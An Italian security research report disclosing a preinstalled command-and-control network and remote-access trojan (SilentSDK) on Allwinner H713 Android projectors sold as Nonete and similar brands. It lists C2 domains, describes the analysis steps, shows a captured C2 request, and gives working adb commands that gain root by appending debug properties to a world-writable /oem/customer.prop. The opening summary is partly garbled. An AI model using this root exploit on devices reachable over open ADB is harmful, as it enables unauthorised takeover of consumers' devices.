
Analisi di una c2-network di beamers cinesi - SilentSDK-Analysis
Report di Analisi Tecnica — Ricerca sulla Sicurezza
Dispositivi interessati: Molteplici proiettori Android di marche come Nonete (es. Modello HY260Pro) (probabilmente anche diversi proiettori di Magcubic, Hotack, Huyukang e molti altri, poiché queste aziende distribuiscono modelli simili e ci sono indicazioni a supporto)
Piattaforma Chipset: Allwinner H713 / sun50iw12p1 — potenzialmente colpisce tutti i dispositivi su questa piattaforma
Periodo di analisi: 11–17 aprile 2026
Classificazione: Infrastruttura Command-and-Control preinstallata con payload Remote Access Trojan
api.pixelpioneerss.com), estrae ID di dispositivo sensibili e può scaricare ed eseguire codice malevolo arbitrario aggiuntivo con privilegi di root in qualsiasi momento (chmod 777). Inoltre, i dispositivi presentano backdoor di root aperte.*.aodintech.com, api.pixelpioneerss.com, sta.smartinnovate.net) devono essere bloccati a livello di rete. Gli utenti colpiti possono solo disabilitare manualmente le app dannose tramite ADB, poiché sono profondamente integrate nel sistema.L'infrastruttura malware documentata in questo report è preinstallata su proiettori Android attualmente venduti in grandi quantità ai consumatori finali su Amazon, eBay e AliExpress. I dispositivi colpiti potrebbero includere più marche (Hotack, Huyukang, Magcubic, Nonete, tra gli altri). Un'infrastruttura C2 identica è stata confermata indipendentemente su altri dispositivi dello stesso produttore (vedi Sezione 13). Lo schema corrisponde ai casi BADBOX.
Dispositivo acquistato: Link Amazon - Nonete Mini Beamer 4K 1080P
| Proprietà | Valore |
|---|---|
| Nome del marchio | Nonete HY260Pro (modello venduto da più aziende) |
| Nome modello interno | NT10 |
| SoC | Allwinner sun50iw12p1 (ARM 32-bit) |
| Sistema operativo | SpectraOS (Android 11, Kernel 5.4.99) |
| Impronta di build reale | Allwinner/h713_tuna_p3/h713-tuna_p3:11 |
| Impronta di build falsificata | ADT-3/adt3/adt3:11/RP1A.201005.006 |
| SELinux | Permissive (nessuna applicazione) |
| Chiave di firma della piattaforma | Chiave di test AOSP pubblica |
| Certificato OEM | CN=蓝鲨, OU=www.bsh.me, C=CN |
| Canale firmware | HY260Pro_SpectraOS_TPYB |
Nota sull'ambito: Il chipset Allwinner H713 è integrato in numerosi proiettori Android economici venduti sotto marchi che cambiano nel mercato europeo. La base firmware identica (h713_tuna_p3) e l'operatore C2 identico (Shenzhen Aodin Technology) suggeriscono fortemente che tutti i dispositivi di questo OEM contengano la stessa infrastruttura.
| Passo | Azione | Risultato |
|---|---|---|
| 1 | Cattura del traffico di rete con Wireshark | Traffico HTTP verso store-api.aodintech.com |
| 2 | Decodifica della risposta C2 compressa con gzip | 7 app, inclusa la nascosta "SilentTools" |
| 3 | Decifratura AES-CBC del percorso di download | Chiave [REDACTED], URL al file .bpp |
| 4 | Exploit root tramite /oem/customer.prop | uid=0(root) dopo l'iniezione di proprietà |
| 5 | Dump forense di /data, /oem, /system | APK, database, configurazioni |
| 6 | Analisi statica del DEX di StoreOS | pm install -r -d, protezione di inversione dei byte |
| 7 | Reverse engineering del meccanismo reverseLen | Comprensione della protezione anti-analisi |
| 8 | Rottura della protezione di inversione dei byte | DEX di SilentSDK decifrato e analizzabile |
| 9 | Decifratura XOR delle stringhe di SilentSDK | Dominio C2 api.pixelpioneerss.com confermato |
| 10 | Verifica degli hash da tre fonti | MD5/SHA-256 corrispondono perfettamente |
| 11 | Reverse engineering del processo di download del malware | Server ancora online |
| 12 | Reverse engineering del malware | Framework RAT basato su plugin |
L'accesso root è stato ottenuto attraverso una combinazione di tre vulnerabilità:
/oem scrivibile da tutti — La partizione è montata come FAT con fmask=0000.customer.prop caricato all'avvio — Sovrascrive le proprietà di sistema.```bash
adb shell getenforce # Result: Permissive
adb shell ls -la /oem/ # All files world-writableadb shell 'echo "ro.debuggable=1" >> /oem/customer.prop' adb shell 'echo "service.adb.root=1" >> /oem/customer.prop' adb shell 'echo "ro.secure=0" >> /oem/customer.prop'
adb reboot && adb wait-for-device && adb root adb shell id
**Impatto:** Qualsiasi utente con accesso fisico o un attaccante sulla stessa rete (tramite ADB, porta 5555 aperta, nessuna autenticazione) ottiene pieno accesso root.
---
## 4. Risposta del Server C2 — Prove Principali
### Richiesta HTTP Catturata```http
POST /sign/app/list HTTP/1.1
chanId: HY260Pro_SpectraOS_TPYB
timestamp: 1775904428922
sign: [REDACTED]
Content-Type: application/json;charset=UTF-8
Content-Length: 184
Host: store-api.aodintech.com
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: okhttp/5.0.0-alpha.12
La risposta compressa gzip contiene un elenco JSON di sette app. Sei di esse sono app di streaming regolari (YouTube, Netflix, Disney+, Prime Video, Chrome, BrowseHere). La settima è SilentTools:
| App | Package | isShow | isForce | isSilent Install | isSilent Uninstall | launch Type |
|---|---|---|---|---|---|---|
| YouTube | com.google.android.youtube.tv | true | false | false | false | 0 |
| Disney+ | com.disney.disneyplus | true | false | false | false | 0 |
| Netflix | com.netflix.mediaclient | true | false | false | false | 0 |
| Chrome | com.android.chrome | true | false | false | false | 0 |
| Prime Video | com.amazon.amazonvideo.livingroom | true | false | false | false | 0 |
| BrowseHere | com.tcl.browser | true | false | false | false | 0 |
| SilentTools | com.hotack.silentsdk | false | true | false | true | 1 |